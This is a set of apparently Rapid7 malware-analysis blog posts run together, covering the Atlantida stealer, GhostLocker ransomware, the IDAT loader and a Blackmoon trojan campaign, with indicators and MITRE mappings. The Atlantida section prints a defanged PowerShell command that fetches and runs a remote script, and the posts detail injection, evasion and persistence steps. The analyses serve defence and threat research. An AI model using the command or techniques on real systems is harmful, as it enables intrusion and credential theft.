Recently, Rapid7 observed a new stealer named Atlantida. The stealer tricks users to download a malicious file from a compromised website, and uses several evasion techniques such as reflective loading and injection before the stealer is loaded.
Atlantida steals a wide range of login information of softwares like Telegram, Steam, several offline cryptocurrency wallets data, browser stored data as well as cryptocurrency wallets browser extension data. It also captures the victim’s screen and collects hardware data.
Technical Analysis
Stage 1 – Delivery
The attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, we observed a Visual Basic Script that decrypts a hardcoded base64 string and executes the decrypted content:
The decrypted command : “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” irm hxxp://166.1.160[.]10/loader.txt | iex“ .
Stage 2 – Three levels of in-memory loading
The executed PowerShell command downloads and executes a next stage PowerShell script in memory.
The PowerShell script downloads and reflectively loads a .NET downloader. The .NET downloader is a simple downloader that calls DownloadData API function to get a Donut injector. Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and .NET assemblies. Next, the Donut is injected to newly created “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe” by using a Remote Thread Injection Technique (aka CreateRemoteThread). This technique works by writing a shellcode into the context of another eligible process and creating a thread for that process to run the payload.
Figure 4 – .Net downloader Main function
Stage 3 – Atlantida Stealer
The Donut injector is used to load a final payload, which in our case is a new Atlantida Stealer. It got its name following the string found in the executable.
First, the Atlantida stealer captures the entire screen by using the combination of GetDC, CreateCompatibleDC,CreateDIBSection, SelectObject and BitBlt API function combination. Next, it checks if a Filezilla (open source FTP software, that allows users to transfer files from a local to a remote computer) recent services file exists. It does that by attempting to open “C:\Users\username\AppData\Roaming\FileZilla\recentservers.xml” if it does, it reads the file. Next, it looks for the following offline cryptocurrency wallets by enumerating the files under the wallet path:
The stealer reads all the files found under the enumerated path.
Next, it collects the victim’s hardware data such as RAM, GPU, CPU and screen resolution. The stealer enumerates the user’s Desktop folder and reads all text files(.txt). It also looks for Binance wallet credentials by enumerating a `C:\Users\Username\AppData\Roaming\Binance` directory and reading all JSON files under it.
Steam (video game digital distribution service) configuration and credentials are also in Atlantida stealer’s interest as we observed it enumerating the Steam configuration directory and searches for the following files:
Ssfn – Steam Sentry File.
Config.vdf – Stream configuration file.
Loginusers.vdf – stores the records of previously logged-in Steam accounts.
Figure 6 – Steam files enumeration
The last thing that Atlantida is harvesting is Telegram data. It collects all the data located in “C:\Users\Username\AppData\Roaming\Telegram Desktop\tdata”.
The stealer now connects to the hard coded C&C server (45.144.232.99). We accessed the hardcoded IP and got to the login page of what we assume is a stealers control panel, which also had an `Atlantida` title.
Figure 7 – Atlantida login page
No data is passed to the C&C server this time and the stealer continues its collection. Differently from other stealers, Atlantida focuses only on three web browsers: Google Chrome, Mozilla Firefox and Microsoft Edge. It steals all stored passwords, cookies, tokens, credit cards and autofills.
One of the notable functions of Atlantida stealer is its ability to steal data from Chrome-based browser extensions. For each Chrome-based extension, an “Extension ID” is given. The malware uses this information to harvest data stored within. Atlantida harvests data from the following cryptocurrency wallets extensions:
When the stealer finishes the collection, all data is compressed and sent to the C&C server. Then the malware exists.
Rapid7 Customers
For Rapid7 MDR and InsightIDR customers, the following Attacker Behavior Analytics (ABA) rules are currently deployed and alerting on the activity described in this blog:
In recent years, there has been a noticeable uptick in threat actors venturing into the realm of Ransom-as-a-Service (RaaS). Some have emerged as significant threats, while others have faded into obscurity. What makes the current landscape unusual is the entry of hacktivist groups into this domain. One such group, GhostSec, has introduced a novel Ransom-as-a-Service encryptor known as GhostLocker. GhostSec’s focus has predominantly been on well-established telecommunications companies, surveillance systems, and Internet of Things (IoT) devices.
GhostLocker is being marketed as a groundbreaking, enterprise-grade locking software that prioritizes safety and effectiveness above all else. Initially priced at $999 for the first 15 affiliates, GhostSec anticipates raising this fee to $4,999 in the future. This executive summary provides a snapshot of our investigation and key findings pertaining to this emerging ransomware variant.
Figure 1 – GhostLocker announcement
GhostLocker RaaS was announced on October 8th, 2023 and since then several updates were made to the encryptor. Rapid7 researchers obtained several new GhostLocker samples and took a quick look at them. This blog — based on one of the first publicly available samples — and the analysis led us to the conclusion that the encryptor is still under development and lacks the basic capability to encrypt files.
Figure 2 – GhostLocker update timeline
Technical Analysis
Announced by GhostSec, the new GhostLocker encryptor’s major features include:
Military-grade encryption on runtime
Undetectability by using a polymorphic stub, and guaranteeing zero detections out of all major antivirus (AV) solutions
Protection against reverse engineering
Self-delete
Killing services
Automatic privilege escalation
Persistence mechanism
Watchdog process
Delayed encryption
GhostSec is also offering their affiliates a fully functional statistics and negotiation platform.
GhostSec used Python to create their encryptor. The first sample spotted by Rapid7 was a PyInstaller executable. PyInstaller is used to package Python code into standalone executable applications for various operating systems. It takes a Python script and generates a single executable file that contains all the necessary dependencies and can be run on computers that do not have Python installed. This allows for easy distribution and deployment of Python applications, as the user does not need to have Python and any required modules installed on their system in order to run the application. We extracted the python scripts from the installer. Most of the extracted files were legitimate public python libraries and the only one that caught our attention is the main.py script.
Figure 3 – Main function of main.py
Main.py script seems to contain a hard-coded affiliate panel IP address and the fully implemented function that sends the infected machine name to the panel. The IP address is of a hosting company from which we have observed ransomware activity this year.
Figure 4 – Hard-coded URL and the victim’s data sending function
By checking the main function we can follow the exact attack flow of the GhostLocker encryptor. First, the encryption key will be created by using a Fernet encryption module which uses the Advanced Encryption Standard (AES) to encrypt data. The generate_key() method from the Fernet library is used to create a 32-byte URL-safe base64-encoded key, which is later used in the AES encryption procedure.
Figure 5 – Fernet key generation
Next, it will generate the victim ID and retrieve the victim’s username by using getpass Python library. The function getpass.getuser() is used to return the “login name” of the user. After all key generation is done, GhostLocker will send a json data containing the victim’s ID, encryption key, and the victim’s PC name to the attacker’s panel. And here is the first hint of ‘work in progress’ encryptor: the ‘pcname’ passed is hard-coded ‘hi’:
Figure 6 – Hard-coded ‘hi’ pcname
The victim’s information and encryption key are sent in clear text via HTTP protocol, as shown in the image below:
Figure 7 – From GhostLocker pcap
After sending the victim info to the attacker’s panel, the GhostLocker is supposed to start the encryption process; however, in the sample we analyzed, the encryption function was not implemented:
Figure 8 – File encryption function
After the supposed encryption is done, GhostLocker will drop a ransom note to the Document folder:
Figure 9 – Ransom note content in the main.py file
The ransom note html file name is Imao which is an acronym to ‘Laughing My Ass Off’, although there is nothing funny for the victim in that note. It is either the attacker is meant to be laughing at the victim or that name is used just for the developer’s checks and will be changed in the future. The ransom note is pretty straightforward; it explains to the victim what happened to their files and how to contact the attacker. Weirdly, it dropped only to the `Documents` folder which makes it difficult to notice. It was observed that the attackers employed an end-to-end encrypted messaging platform, Session, as a source of communication between victims and the ransomware developers. The link to this messenger is embedded into the body of the ransom note, providing victims with a direct path to download the application.
Figure 10 – Imao.html ransom note
After a closer look at the ransom note written in HTML format, it became evident that the ransom note was handcrafted rather than generated, as it contained syntax errors. A clear example of such an error can be seen in the word “paty” instead of “party,” showing that most likely a human wrote it: “DO NOT try to decrypt your data using third paty software, it may cause permanent data loss.”
Additionally, the main.py contains the sendWebhook(msg) function. That function is designed to send a message or data to a Discord Webhook. The webhook URL is hardcoded in the code; however, we did not see the function being called and what kind of message is being sent to the attacker’s discord channel. Though being fully implemented, this function was never called.
Figure 11 – Unused sendWebhook function
When executed for the first time, several embedded files are dropped into a new folder created in the user’s temp directory. One of the files is a second stage executable that is executed as a child process of the installer. The installer waits until the child process exits by using WaitForSingleObject API call. When the child process exits, the installer implements the self delete feature and deletes all the dropped files.
The newer versions of GhostLocker are compiled with Nuitka. Nuitka compiles a Python program to a C binary — not by packaging the CPython runtime with the program bytecode, but by translating Python instructions into C. Compiling the malware with Nuitka makes it harder to investigate.
Rapid7 Customers
For Rapid7 MDR and InsightIDR customers, all executed binaries will undergo comprehensive analysis against the hash reputation service to determine if it is a known malicious file and will alert on malicious hashes. Additionally, through our behavior-based detection rules we will be able to recognize patterns of activity associated with these threat actors in order to provide customers coverage and alerts to safeguard their systems before ransomware gets deployed.
Recently, Rapid7 observed the Fake Browser Update lure tricking users into executing malicious binaries. While analyzing the dropped binaries, Rapid7 determined a new loader is utilized in order to execute infostealers on compromised systems including StealC and Lumma.
The IDAT loader is a new, sophisticated loader that Rapid7 first spotted in July 2023. In earlier versions of the loader, it was disguised as a 7-zip installer that delivered the SecTop RAT. Rapid7 has now observed the loader used to deliver infostealers like Stealc, Lumma, and Amadey. It implements several evasion techniques including Process Doppelgänging, DLL Search Order Hijacking, and Heaven’s Gate. IDAT loader got its name as the threat actor stores the malicious payload in the IDAT chunk of PNG file format.
Prior to this technique, Rapid7 observed threat actors behind the lure utilizing malicious JavaScript files to either reach out to Command and Control (C2) servers or drop the Net Support Remote Access Trojan (RAT).
The following analysis covers the entire attack flow, which starts from the SocGholish malware and ends with the stolen information in threat actors’ hands.
Technical Analysis
Threat Actors (TAs) are often staging their attacks in the way security tools will not detect them and security researchers will have a hard time investigating them.
Figure 1 – Attack Flow
Stage 1 – SocGholish
First observed in the wild as early as 2018, SocGholish was attributed to TA569. Mainly recognized for its initial infection method characterized as “drive-by” downloads, this attack technique involves the injection of malicious JavaScript into compromised yet otherwise legitimate websites. When an unsuspecting individual receives an email with a link to a compromised website and clicks on it, the injected JavaScript will activate as soon as the browser loads the page.
The injected JavaScript investigated by Rapid7 loads an additional JavaScript that will access the final URL when all the following browser conditions are met:
The access originated from the Windows OS
The access originated from an external source
Cookie checks are passed
Figure 2 – Obfuscated JavaScript Embedded in the Compromised Domain
This prompt falsely presents itself as a browser update, with the added layer of credibility coming from the fact that it appears to originate from the intended domain.
Figure 3 – Pop-up Prompting the User to Update their Browser
Once the user interacts with the “Update Chrome” button, the browser is redirected to another URL where a binary automatically downloads to the user’s default download folder. After the user double clicks the fake update binary, it will proceed to download the next stage payload. In this investigation, Rapid7 identified a binary called ChromeSetup.exe, the file name widely used in previous SocGholish attacks.
Stage 2 – MSI Downloader
ChromeSetup.exe downloads and executes the Microsoft Software Installer (MSI) package from: hxxps://ocmtancmi2c5t[.]xyz/82z2fn2afo/b3/update[.]msi.
In similar investigations, Rapid7 observed that the initial dropper executable appearance and file name may vary depending on the user’s browser when visiting the compromised web page. In all instances, the executables contained invalid signatures and attempted to download and install an MSI package.
Rapid7 determined that the MSI package executed with several switches intended to avoid detection:
/qn to avoid an installation UI
/quiet to prevent user interaction
/norestart to prevent the system from restarting during the infection process
When executed, the MSI dropper will write a legitimate VMwareHostOpen.exe executable, multiple legitimate dependencies, and the malicious Dynamic-Link Library (DLL) file vmtools.dll. It will also drop an encrypted vmo.log file which has a PNG file structure and is later decrypted by the malicious DLL. Rapid7 spotted an additional version of the attack where the MSI dropped a legitimate pythonw.exe, legitimate dependencies, and the malicious DLL file python311.dll.In that case, the encrypted file was named pz.log,though the execution flow remains the same.
Figure 4 – Content of vmo.log
Stage 3 – Decryptor
When executed, the legitimate VMWareHostOpen.exe loads the malicious vmtools.dllfrom the same directory as from which the VMWareHostOpen.exeis executed. This technique is known as DLL Search Order Hijacking.
During the execution of vmtools.dll, Rapid7 observed that the DLL loads API libraries from kernel32.dll and ntdll.dll using API hashing and maps them to memory. After the API functions are mapped to memory, the DLL reads the hex string 83 59 EB ED 50 60 E8 and decrypts it using a bitwise XOR operation with the key F5 34 84 C3 3C 0F 8F, revealing the string vmo.log. The file is similar to the Vmo\log directory, where Vmware logs are stored.
The DLL then reads the contents from vmo.log into memory and searches for the string …IDAT. The DLL takes 4 bytes following …IDAT and compares them to the hex values of C6 A5 79 EA. If the 4 bytes following …IDAT are equal to the hex values C6 A5 79 EA, the DLL proceeds to copy all the contents following …IDAT into memory.
Figure 5 – Function Searching for Hex Values C6 A5 79 EA
Once all the data is copied into memory, the DLL attempts to decrypt the copied data using the bitwise XOR operation with key F4 B4 07 9A. Upon additional analysis of other samples, Rapid7 determined that the XOR keys were always stored as 4 bytes following the hex string C6 A5 79 EA.
Figure 6 – XOR Keys found within PNG Files pz.log and vmo.log
Once the DLL decrypts the data in memory, it is decompressed using the RTLDecompressBuffer function. The parameters passed to the function include:
Compression format
Size of compressed data
Size of compressed buffer
Size of uncompressed data
Size of uncompressed buffer
Figure 7 – Parameters passed to RTLDecompressBuffer function
The vmtools.dll DLL utilizes the compression algorithm LZNT1 in order to decompress the decrypted data from the vmo.log file.
After the data is decompressed, the DLL loads mshtml.dll into memory and overwrites its .text section with the decompressed code. After the overwrite, vmtools.dll calls the decompressed code.
Stage 4 – IDAT Injector
Similarly to vmtools.dll,IDAT loader uses dynamic imports. The IDAT injector then expands the %APPDATA% environment variable by using the ExpandEnvironmentStringsW API call. It creates a new folder under %APPDATA%, naming it based on the QueryPerformanceCounter API call output and randomizing its value.
All the dropped files by MSI are copied to the newly created folder. IDAT then creates a new instance of VMWareHostOpen.exefrom the %APPDATA% by using CreateProcessW and exits.
The second instance of VMWareHostOpen.exebehaves the same up until the stage where the IDAT injector code is called from mshtml.dllmemory space. IDAT immediately started the implementation of the Heaven’s Gate evasion technique, which it uses for most API calls until the load of the infostealer is completed.
Heaven’s Gate is widely used by threat actors to evade security tools. It refers to a method for executing a 64-bit process within a 32-bit process or vice versa, allowing a 32-bit process to run in a 64-bit process. This is accomplished by initiating a call or jump instruction through the use of a reserved selector. The key points in analyzing this technique in our case is to change the process mode from 32-bit to 64-bit, the specification of the selector “0x0033” required and followed by the execution of a far call or far jump, as shown in Figure 8.
Figure 8 – Heaven’s Gate technique implementation
The IDAT injector then expands the %TEMP% environment variable by using the ExpandEnvironmentStringsW API call. It creates a string based on the QueryPerformanceCounter API call output and randomizes its value.
Next, the IDAT loader gets the computer name by calling GetComputerNameW API call, and the output is randomized by using randand srand API calls. It uses that randomized value to set a new environment variable by using SetEnvironmentVariableW.This variable is set to a combination of %TEMP% path with the randomized string created previously.
Figure 9 – New Environment variable – TCBEDOPKVDTUFUSOCPTRQFD set to %TEMP%\89680228
Now, the new cmd.exe process is executed by the loader. The loader then creates and writes to the %TEMP%\89680228 file.
Creates a new memory section inside the remote process by using the NtCreateSection API call
Maps a view of the newly created section to the local malicious process with RW protection by using NtMapViewOfSection API call
Maps a view of the previously created section to a remote target process with RX protection by using NtMapViewOfSection API call
Fills the view mapped in the local process with shellcode by using NtWriteVirtualMemory API call
In our case, IDAT loader suspends the main thread on the cmd.exeprocess by using NtSuspendThread API call and then resumes the thread by using NtResumeThreadAPI call After completing the injection, the second instance of VMWareHostOpen.exeexits.
Stage 5 – IDAT Loader:
The injected loader code implements the Heaven’s Gate evasion technique in exactly the same way as the IDAT injector did. It retrieves the TCBEDOPKVDTUFUSOCPTRQFD environment variable, and reads the %TEMP%\89680228 file data into the memory. The data is then recursively XORed with the 3D ED C0 D3 key.
The decrypted data seems to contain configuration data, including which process the infostealer should be loaded, which API calls should be dynamically retrieved, additional code,and more. The loader then deletes the initial malicious DLL (vmtools.dll) by using DeleteFileW.The loader finally injects the infostealer code into the explorer.exe process by using the Process Doppelgänging injection technique.
TheProcess Doppelgängingmethod utilizes the Transactional NTFS feature within the Windows operating system. This feature is designed to ensure data integrity in the event of unexpected errors. For instance, when an application needs to write or modify a file, there’s a risk of data corruption if an error occurs during the write process. To prevent such issues, an application can open the file in a transactional mode to perform the modification and then commit the modification, thereby preventing any potential corruption. The modification either succeeds entirely or does not commence.
Process Doppelgänging exploits this feature to replace a legitimate file with a malicious one, leading to a process injection. The malicious file is created within a transaction, then committed to the legitimate file, and subsequently executed. The Process Doppelgängingin our sample was performed by:
Initiating a transaction by using NtCreateTransaction API call
Creating a new file by using NtCreateFile API call
Writing to the new file by using NtWriteFileAPI call
Writing malicious code into a section of the local process using NtCreateSectionAPI call
Discarding the transaction by using NtRollbackTransactionAPI call
Running a new instance of explorer.exe process by using NtCreateProcessEx API call
Running the malicious code inside explorer.exe process by using NtCreateThreadExAPI call
If the file created within a transaction is rolled back (instead of committed), but the file section was already mapped into the process memory, the process injection will still be performed.
The final payload injected into the explorer.exe process was identified by Rapid7 as Lumma Stealer.
Figure 10 – Process Tree
Throughout the whole attack flow, the malware delays execution by using NtDelayExecution, a technique that is usually used to escape sandboxes.
As previously mentioned, Rapid7 has investigated several IDAT loader samples. The main differences were:
The legitimate software that loads the malicious DLL.
The name of the staging directory created within %APPDATA%.
The process the IDAT injector injects the Loader code to.
The process into which the infostealer/RAT loaded into.
Rapid7 observed the IDAT loader has been used to load the following infostealers and RAT: Stealc, Lumma and Amadey infostealers and SecTop RAT.
Figure 11 – Part of an HTTP POST request to a StealC C2 domainFigure 12 – An HTTP POST request to a Lumma Stealer C2 domain
Conclusion
IDAT Loader is a new sophisticated loader that utilizes multiple evasion techniques in order to execute various commodity malware including InfoStealers and RAT’s. The Threat Actors behind the Fake Update campaign have been packaging the IDAT Loader into DLLs that are loaded by legitimate programs such as VMWarehost, Python and Windows Defender.
Rapid7 Customers
For Rapid7 MDR and InsightIDR customers, the following Attacker Behavior Analytics (ABA) rules are currently deployed and alerting on the activity described in this blog:
Attacker Technique – MSIExec loading object via HTTP
Suspicious Process – FSUtil Zeroing Out a File
Suspicious Process – Users Script Spawns Cmd And Redirects Output To Temp File
Suspicious Process – Possible Dropper Script Executed From Users Downloads Directory
Suspicious Process – WScript Runs JavaScript File from Temp Or Download Directory
MITRE ATT&CK Techniques:
Initial Access
Drive-by Compromise (T1189)
The SocGholish Uses Drive-by Compromise technique to target user’s web browser
Defense Evasion
System Binary Proxy Execution: Msiexec (T1218.007)
The ChromeSetup.exe downloader (C9094685AE4851FD5A5B886B73C7B07EFD9B47EA0BDAE3F823D035CF1B3B9E48) downloads and executes .msi file
Execution
User Execution: Malicious File (T1204.002)
Update.msi (53C3982F452E570DB6599E004D196A8A3B8399C9D484F78CDB481C2703138D47) drops and executes VMWareHostOpen.exe
Defense Evasion
Hijack Execution Flow: DLL Search Order Hijacking (T1574.001)
VMWareHostOpen.exe loads a malicious vmtools.dll (931D78C733C6287CEC991659ED16513862BFC6F5E42B74A8A82E4FA6C8A3FE06)
Rapid7 is tracking a new, more sophisticated and staged campaign using the Blackmoon trojan, which appears to have originated in November 2022. The campaign is actively targeting various businesses primarily in the USA and Canada. However, it is not used to steal credentials, instead it implements different evasion and persistence techniques to drop several unwanted programs and stay in victims’ environment for as long as possible.
Blackmoon, also known as KRBanker, is a banking trojan first spotted in late September 2015 when targeting banks of the Republic of Korea. Back in 2015, it was using a “pharming” technique to steal credentials from targeted victims. This technique involves redirecting traffic to a forged website when a user attempts to access one of the banking sites being targeted by the cyber criminals. The fake server masquerades the original site and urges visitors to submit their information and credentials.
Stage 1 – Blackmoon
Blackmoon trojan was named after a debug string “blackmoon,” that is present in its code:
Blackmoon string found inside malware’s code
Blackmoon drops a dll into C:\Windows\Logs folder named RunDllExe.dll and implements a Port Monitors persistence technique. Port Monitors is related to the Windows Print Spooler Service or spoolsv.exe. When adding a printer port monitor a user (or the attacker in our case) has the ability to add an arbitrary dll that acts as the monitor. There are two ways to add a port monitor: via Registry for persistence or via a AddMonitor API call for immediate dll execution.
Our sample implements both, it calls AddMonitor API call to immediately execute RunDllExe.dll:
AddMonitorA API call
It also sets a Driver value in HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\RunDllExe registry key to the malicious dll path.
Driver value set under monitors registry key
Next, the malware adds a shutdown system privilege to the Spooler service by adding SeShutdownPrivilege to the RequiredPrivileges value of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler registry key.
RequiredPrivileges data before and after the update
The malware disables Windows Defender by setting HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware value to “1”.
It also stops and disables “Lanman” service (the service that allows a computer to share files and printers with other devices on the network).
To block all incoming RPC and SMB communication the malware executes the set of following commands:
The malware sets two additional values under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspnet_staters: Work and Mining, both set to “1”.
Next, the malware checks if one of the following services exists on the victim computer:
clr_optimization_v3.0.50727_32
clr_optimization_v3.0.50727_64
WinHelpsvcs
Services
Help Service
KuGouMusic
WinDefender
Msubridge
ChromeUpdater
MicrosoftMysql
MicrosoftMssql
Conhost
MicrosotMaims
MicrosotMais
In case the service is found, it will be disabled (by setting “Start” value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename to “4”) or deleted by using DeleteService API call.
The malware enumerates running processes by using a combination of CreateToolhelp32Snapshot and Process32First and Process32Next API calls to terminate service’s process if one is running.
Finally, a Powershell command is executed to delete the running process’s file and the malware exits.
Stage 2 – RunDllExe.dll – injector
RunDllExe.dll is executed by Spooler service and is responsible for injecting a next stage payload into the newly executed svchost.exe process. The malware implements Process Hollowing injection technique. The injected code is a C++ file downloader.
Stage 3 – File Downloader
The downloader first checks if ‘Work’ and ‘Mining’ values exist and set under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspnet_staters registry key, if the values do not exist, it will create them and set both to “1”.
As downloader, this part of the attack flow is checking if all needed to be downloaded files are already present (by using PathFileExistsA API call) on the PC, if not, the malware sleeps for two minutes before every download and then use the URLDownloadToFileA API call to download the following files:
After the download all but the MpMgSvc.dll are executed by the downloader:
Execution tree
Stage 4 – Hook.exe – dropper
Hook.exe drops an additional dll to the users roaming folder C:\Users\Username\AppData\Roaming\GraphicsPerfSvcs.dll and creates a new service named GraphicsPerfSvcs, which will be automatically executed at system startup. The service name is almost identical to the legitimate service named GraphicsPerfSvc, which belongs to the Graphics performance monitor service. Naming services and files similarly to the once belonged to OS is an evasion technique widely used by threat actors.
Malicious Service under the legitimate one
The dropper starts the created service. It then creates and executes a .vbs which responsible for deleting Hook.exe and the .vbs itself:
Created .vbs
Stage 4.1 – MpMgSvc.exe – spreader MpMgSvc.exe first creates a new \BaseNamedObjects\Brute_2022 mutex. As being responsible for spreading the malware, it drops Doublepulsar-1.3.1.exe, Eternalblue-2.2.0.exe, Eternalromance-1.4.0.exe and all required for these files libraries into the C:\Windows\Temp folder.
Then it scans the network for PC’s with open 3306, 445, 1433 ports. If any open ports are found, the spreader will attempt to install a backdoor by using EternalBlue and send shellcode to inject dll with Doublepulsar as implemented in the Eternal-Pulsar github project .
Eternal-Pulsar commands in spreader memory
There are two dlls dropped, one for x64 architecture and the second one for x86. When injected by Doublepulsar it will download the first stage Blackmoon malware and follow the same execution stages described in this analysis.
Stage 4.2 – WmiPrvSER.exe – XMRig miner
WmiPrvSER.exe is a classic XMRig Monero miner. Our sample is the XMRig version 6.18, and it creates a BaseNamedObjects\\Win__Host mutex on the victim’s host.You can find a full report on XMRig here.
Stage 5 – GraphicsPerfSvcs service – dropper
As mentioned in the previous stage, the GraphicsPerfSvcs service will be started automatically at system startup. Every time it runs, it will check if two of the following files exist:
The service stays up and constantly attempts to read from the URL: hxxp://down.ftp21[.]cc/Update.txt. At the time of the analysis, this URL was down so we were not able to observe its content. However, following the service code, it seems to read the URL content and check if it contains one of the following commands:
[Delete File], [Kill Proccess], or [Delete Service], which will delete file, kill process or delete service accordingly.
Stage 6 – Ctfmoon.exe and Traffmonetizer.exe – Traffic Stealers
GraphicsPerfSvcs service executes two dropped files: Ctfmoon.exe and Traffmonetizer.exe, both appeared to be Potentially Unwanted Programs (PUP’s) in the form of traffic stealers. Both software are using the “network bandwidth sharing” monetization scheme to make “passive income”.
Ctfmoon.exe is a cli version of the Iproyal Pawns application. It gets the user email address and password as execution parameters to associate the activity and collect the money to the passed account. GraphicsPerfSvcs executes the following command line to start the Iproyal Pawns: ctfmoon.exe [email protected] -password=123456Aa. -device-name=Win32 -accept-tos
We can see that the user mentioned in our execution parameters already made $169:
Iproyal Pawns earnings from our sample
The Traffmonetizer.exe is similar to Ctfmoon.exe, created by Traffmonetizer. It reads the user account data from a settings.json file dropped in users roaming directory. Our .json file contains the following content:
The analysis in this blog reveals the effort threat actors put into the attack flow, by using several evasion and persistence techniques and using different approaches to increase their income and use victim resources.
MITRE ATT&CK Techniques:
Persistence
Boot or Logon Autostart Execution: Port Monitors (T1547.010)
The Blackmoon trojan (a95737adb2cd7b1af2291d143200a82d8d32
a868c64fb4acc542608f56a0aeda) is using Port Monitors technique to establish persistence on the target host.
Persistence
Create or Modify System Process: Windows Service (T1543.003)
The Hook.exe dropper (1A7A4B5E7C645316A6AD59E26054A95
654615219CC03657D6834C9DA7219E99F) creates a new service to establish persistence on the target host.
Defense Evasion
Process Injection: Process Hollowing (T1055.012)
The dll dropped by Blackmoon (F5D508C816E485E05DF5F58450D623DC6B
FA35A2A0682C238286D82B4B476FBB) is using the process hollowing technique to evade endpoint security detection.
Defense Evasion
Impair Defenses: Disable or Modify Tools (T1562.001)
The Blackmoon trojan (a95737adb2cd7b1af2291d143200a82d8
d32a868c64fb4acc542608f56a0aeda) disables Windows Defender to evade end-point security detection.
Lateral Movement
Exploitation of Remote Services (T1210)
The MpMgSvc.exe spreader (72B0DA797EA4FC76BA4DB6AD131056257965D
F9B2BCF26CE2189AF3DBEC5B1FC) uses EternalBlue and DoublePulsar to spread in organization’s environment.
Discovery
Network Share Discovery (T1135)
The MpMgSvc.exe spreader (72B0DA797EA4FC76BA4DB6AD131056257965D
F9B2BCF26CE2189AF3DBEC5B1FC) scans the network do discover open SMB ports.
Impact
Resource Hijacking (T1496)
The XMRing miner (ECC5A64D97D4ADB41ED9332E4C0F5DC7DC02
A64A77817438D27FC31C69F7C1D3), Iproyal Pawns trafficStealer (FDD762192D351CEA051C0170840F1D8D
171F334F06313A17EBA97CACB5F1E6E1) and Traffmonetizer trafficStealer (2923EACD0C99A2D385F7C989882B7CCA
83BFF133ECF176FDB411F8D17E7EF265) executed to use victim’s resources.
Impact
Service Stop (T1489)
The Blackmoon trojan (a95737adb2cd7b1af2291d143200a82d8d
32a868c64fb4acc542608f56a0aeda) stops updates and security products services.
Command and Control
Application Layer Protocol: Web Protocols (T1071.001)
The downloader (E9A83C8811E7D7A6BF7EA7A656041BCD68968
7F8B23FA7655B28A8053F67BE99) downloads next stage payloads over HTTP protocol. GraphicsPerfSvcs service (5AF88DBDC7F53BA359DDC47C3BCAF3F5FE
9BDE83211A6FF98556AF7E38CDA72B) uses HTTP protocol to get command from C&C server.
By continuing to use the site, you agree to the use of cookies. more information
The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.
